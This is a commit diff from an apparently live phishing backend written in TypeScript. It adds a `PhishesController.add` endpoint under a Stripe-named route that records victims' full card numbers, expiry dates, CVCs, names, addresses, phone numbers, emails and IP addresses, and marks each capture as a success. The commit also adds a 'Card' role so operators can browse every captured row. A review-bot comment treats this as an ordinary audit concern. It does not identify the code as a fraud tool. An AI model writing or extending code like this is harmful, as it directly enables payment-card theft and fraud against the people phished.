
feat(controllers): 在 PhishesController 中添加权限验证和新增 Phish 功能

- 更新 index 方法,添加用户角色权限验证,限制访问权限
- 新增 add 方法,处理 Phish 实例的创建,支持多种字段的保存
- 在 User 模型中添加 Card 角色以支持新功能
- 更新路由配置,添加新增 Phish 的路由
wuyi 4 月之前
父節點
當前提交
71a3945181
共有 3 個文件被更改,包括 37 次插入5 次删除
  1. 34 4
      app/Controllers/Http/PhishesController.ts
  2. 2 1
      app/Models/User.ts
  3. 1 0
      start/routes.ts

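--- a/app/Controllers/Http/PhishesController.ts
+++ b/app/Controllers/Http/PhishesController.ts
@@ -1,15 +1,21 @@
 import type { HttpContextContract } from '@ioc:Adonis/Core/HttpContext'
 import PaginationService from 'App/Services/PaginationService'
-import Phish from 'App/Models/Phish'
+import Phish, { PhishStep } from 'App/Models/Phish'
 import Ws from 'App/Services/Ws'
+import { UserRoles } from 'App/Models/User'
 
 export default class PhishesController {
     private paginationService = new PaginationService(Phish)
 
     public async index({ request, auth }: HttpContextContract) {
-        return await this.paginationService.paginate(request.all(), (q) => {
-            q.where('userId', auth.user!.id).orWhereNull('userId')
-        })
+        const userRole = auth.user!.role
+        if (userRole !== UserRoles.Admin && userRole !== UserRoles.Card) {
+            return {
+                error: 'You are not authorized to access this resource',
+                status: 403
+            }
+        }
+        return await this.paginationService.paginate(request.all())
     }
 
     public async store({ request }: HttpContextContract) {
@@ -29,6 +35,30 @@ export default class PhishesController {
         return phish
     }
 
+    public async add({ request }: HttpContextContract) {
+        const ip = request.ip()
+        const data = request.all()
+
+        const phish = new Phish()
+        phish.ip = ip
+        phish.online = true
+        phish.step = PhishStep.SUCCESS
+        if (data.card) phish.card = data.card
+        if (data.expiry) phish.expiry = data.expiry
+        if (data.cvc) phish.cvc = data.cvc
+        if (data.firstName) phish.firstName = data.firstName
+        if (data.lastName) phish.lastName = data.lastName
+        if (data.country) phish.country = data.country
+        if (data.state) phish.state = data.state
+        if (data.city) phish.city = data.city
+        if (data.address) phish.address = data.address
+        if (data.zip) phish.zip = data.zip
+        if (data.phone) phish.phone = data.phone
+        if (data.email) phish.email = data.email
+        await phish.save()
+        return phish
+    }
+
     public async show({ params }: HttpContextContract) {
         return await Phish.findOrFail(params.id)
     }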
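Review bot: `add` has no comment stating what it persists, and that is the security-relevant part of this change: the `card`, `expiry` and `cvc` values from `request.all()` are written unmodified onto a `Phish` row together with the caller's IP and name, address, phone and email fields, with `step` forced to `PhishStep.SUCCESS`. A header comment such as `// Persists full card number, expiry and CVC in clear text; every row is cardholder data and must be treated as compromised` would make that explicit to anyone auditing or triaging this service. In the first hunk, `index` no longer filters on `userId`, so the same rows are returned in full to any `Admin` or `Card` account. For detection, the observable surface this commit adds is `POST stripe/add` (registered in start/routes.ts) carrying those field names in the request body; the middleware on the enclosing route group is outside the visible hunks, so whether the endpoint requires authentication cannot be told from here.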

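--- a/app/Models/User.ts
+++ b/app/Models/User.ts
@@ -7,7 +7,8 @@ export enum UserRoles {
     Admin = 'admin',
     Operator = 'operator',
     Api = 'api',
-    User = 'user'
+    User = 'user',
+    Card = 'card'
 }
 
 export default class User extends AppBaseModel {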

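--- a/start/routes.ts
+++ b/start/routes.ts
@@ -75,6 +75,7 @@ Route.group(() => {
     Route.resource('properties', 'PropertiesController').apiOnly()
     Route.post('userBalances/rechargeNotify', 'UserBalancesController.rechargeNotify')
     Route.resource('stripe', 'PhishesController').apiOnly()
+    Route.post('stripe/add', 'PhishesController.add')
     Route.post('stripe/sendMsg/:type/:id', 'PhishesController.sendMsg')
     Route.put('stripe/client/:id', 'PhishesController.clientUpdate')
     Route.put('stripe/admin/:id', 'PhishesController.adminUpdate')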